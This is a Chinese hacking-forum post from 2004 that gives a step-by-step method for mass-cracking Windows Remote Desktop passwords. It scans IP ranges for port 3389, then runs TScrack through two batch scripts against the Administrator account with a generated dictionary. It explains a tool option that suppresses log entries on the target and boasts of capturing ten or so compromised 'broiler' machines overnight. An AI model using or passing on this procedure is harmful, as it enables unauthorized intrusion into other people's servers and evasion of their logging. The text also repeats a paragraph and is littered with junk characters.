|
作者:霜风 QQ:14226581
0 E D" e$ T2 v) C/ Q, v3 x终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。
9 a# E2 `$ c& A+ ~: G5 o这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下:
9 q9 x# I* N; T) N7 C9 N$ \首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:
& w# J y% d5 _0 Q3 C& S先打开superscan3如图11 B# b% `$ S( N: a& P
) A4 p+ Y7 l% W, F9 ]此主题相关图片如下:5 n$ W! {/ C% M7 H
0 n8 K3 r" {3 w+ c' L2 _% Y
% ?/ J3 B4 [& I1 c接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2
* i8 |* j7 q+ W0 ~/ W) x1 }
# M% K, j& q2 ]此主题相关图片如下:
5 h Y& ]5 J8 u! y0 Q; m
$ R6 r* s: m: |: Q4 s ~1 D" g & y3 E% D0 ?! ]. [4 x0 u6 }3 ], V
然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除., G6 L5 M4 R. B6 G& f: S8 n
这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图3
2 A( _: U, f! i r/ n9 s( }* c, E4 Z5 m; F! T8 _
此主题相关图片如下:
# N0 R% ]' g3 Y# k8 G
: i7 L4 C& a( [6 J E- X1 v8 C' `& P
: k/ J1 B3 I4 |“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。
( q0 N) S4 ?, B# P. q* m3 w" U! D* k9 ^/ s7 [. E ^
此主题相关图片如下:
& G7 t$ q3 w: W. J
/ @1 s8 B Q& H( k" {3 H0 X5 {8 g5 t接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5
) { { ~2 f3 L W" S- {+ e9 s+ R# Y( W7 r
此主题相关图片如下:$ V! R6 E+ t! ^& ~2 t
; ~- A% d' W0 b% |# R4 _2 M0 T进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。5 f, |- E1 K, y
所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。. H) N( U& f0 v) d$ g$ l
TScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。
0 n4 \/ d8 E8 _7 a. Y此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。, n8 x: v+ ~7 M1 T: E$ a3 v
在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:
3 {2 g1 t2 _) K! H1 B5 U-h : Print usage help and exit, _: t: Y0 H3 [
-V : Print version info and exit( M( y- d- [; Z. r; d* i0 ]
-s : Print chipher strenght info and exit
: |0 Y) Z8 h8 L- G b& L-b : Enable failed password beep
/ E' |9 g) ?4 ]-t : Use two simultaneous connections [EXPERIMENTAL]6 B' r8 T3 J+ J1 @
-N : Prevent System Log entries on targeted server* |$ h( ?' R7 l
-U : Uninstall tscrack and remove components. f, c+ s% U) @% m$ t: B
-f <number> : Wordlist entry to start cracking with
9 h7 T$ v" Y8 i-F <delay> : Sampling Frequency (Delay between samples in ms)6 y- U5 ]) s1 O) u& b; i( E
-l <user> : Account name to use, defaults to Administrator- ^* ~7 x3 Y) P$ W& G1 i4 F
-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted3 ] R8 O1 {+ e4 h3 L( e/ r) _
-p <password> : Use <password> to logon instead of wordlist/blank pass7 x# l/ K3 l, F. k, g
-D <domain> : Specify domain to attempt logon to 2 U7 _+ E! a: U( @! E$ B7 G6 H
. n# x% d+ R* k/ C
0 t% @, ?: B, L
我就帮忙翻译一下吧,翻译得不好可不要怪我啊:
3 _5 H; B$ S) |& p-h : 显示使用帮助然后退出
( o4 s+ J7 |7 J$ u7 V-V : 显示版本信息然后退出
^8 B' s! |1 t-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)
" ?5 f' w* Z# K+ [-b : 密码错误时发出声音
. y2 U# ?1 d9 R/ \& W' B! Z% T. m8 N/ n# n-t : 同时发出多个连接,就是多线程。
3 K1 o3 }1 I* D ~0 ]-N : Prevent System Log entries on targeted server5 e4 s9 S4 `3 [& x8 @1 G. J5 v* c
-U : 卸载移除tscrack组件。
5 Z- @! i4 m' b" X K% F-f <number> : 使用-F后面的密码。7 f9 b% v8 F! R8 _8 U( z% U, T
-F <delay> : 间隔时间(频率)# _, B! P1 Q- J6 v4 ]; f' F E7 o
-l <user> : 使用-L后面的用户名
) I" x Y% u" b9 L$ R% o4 u-w <wordlist> : 使用-W后面的字典7 U7 W, B2 I% [9 N" q
-p <password> : 使用-W后的密码' |* S# [0 i3 E
-D <domain> : 登陆主页面?
2 q8 w: d8 P3 M8 @* b, v相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:9 ^, z3 {+ [" C$ m( O( R" E: ~
@if not exist IpcScan.txt goto noscan' C) o$ l0 |2 R" @
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
" r0 l6 e! E' T( f8 n:noscan
7 u z8 K& i2 K3 c: @7 J9 x9 T@echo 3389.txt no find or scan faild 
. y! z8 a/ x& F这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)
9 D) k6 ?6 V: b1 O保存后把后错名改为BAT就可以了。, {7 o o- A5 i* g- ^1 Q
还写一个BAT,名字为HACK.BAT,代码如下:$ n1 X/ Q. y2 q: _+ n! q7 g
@if not exist tscrack.exe goto noscan! j0 T4 b8 \. ^. J2 X
@tscrack %1 -l administartor -w pass.dic >>rouji.txt5 G. N9 }7 g; X0 w, R. o8 D( B
:noscan
0 K* H! k5 |* m! d: A@echo tscrack.exe no find or scan faild + |. R. n/ Q( ], W, v. N* |
这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC9 a1 B) b1 i) Y# Y, C+ n
制作方法如上。
; g" z1 o& d9 R然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6
4 O* |- w6 i9 l
3 g5 e4 n; j/ Z$ ^此主题相关图片如下:( y+ [$ s1 E, z
怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.7 f2 A4 w* j+ N2 f' c+ B3 e
最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7! A B7 \* W/ H% @& i
8 J; x$ z4 q h+ S( x
此主题相关图片如下:" X7 `' t4 n1 F2 l6 ?
# g( K4 n9 {* P& l
怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.! w# T/ Z; |3 C& I) Y8 x6 S2 D
最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ | 
IP卡
狗仔卡
发表于 2004-10-6 09:51
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
